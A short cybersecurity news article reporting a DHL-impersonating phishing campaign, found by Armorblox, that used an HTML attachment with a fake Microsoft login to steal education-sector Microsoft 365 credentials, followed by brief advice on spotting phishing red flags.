As per experts, a new phishing campaign has been discovered that impersonates logistics giant DHL in order to steal Microsoft 365 credentials from victims in the education industry.
Cybersecurity researchers from Armorblox recently found a significant phishing campaign, with more than 10,000 emails sent to inboxes connected to a "private education institution".
The email is designed to appear to be from DHL, with the company branding and tone of voice one would expect from the shipping giant. The recipient is informed in the email titled "DHL Shipping Document/Invoice Receipt" that a customer sent a parcel to the incorrect address and that the correct delivery address must be provided.
False login prompt
The email apparently includes an attachment, labeled "Shipping Document Invoice Receipt," which, when opened, appears to be a blurred-out preview of a Microsoft Excel file.
A Microsoft login page appears over the blurred-out document, attempting to deceive people into believing they must log into their Microsoft 365 accounts in order to view the file's contents. If the victims provide the login credentials, they will be sent directly to the attackers.
Armorblox explained, “The email attack used language as the main attack vector in order to bypass both Microsoft Office 365 and EOP email security controls. These native email security layers are able to block mass spam and phishing campaigns and known malware and bad URLs. However, this targeted email attack bypassed Microsoft email security because it did not include any bad URLs or links and included an HTML file that included a malicious phishing form.”
Businesses can safeguard themselves against phishing attacks by training their employees to recognize red flags in their inboxes, such as the sender's email address, typos and spelling errors, a feeling of urgency (legitimate emails almost never require the user to respond urgently), and unexpected links/attachments.
According to the researchers, the attackers used a valid domain to avoid Microsoft's email(opens in new tab) authentication checks.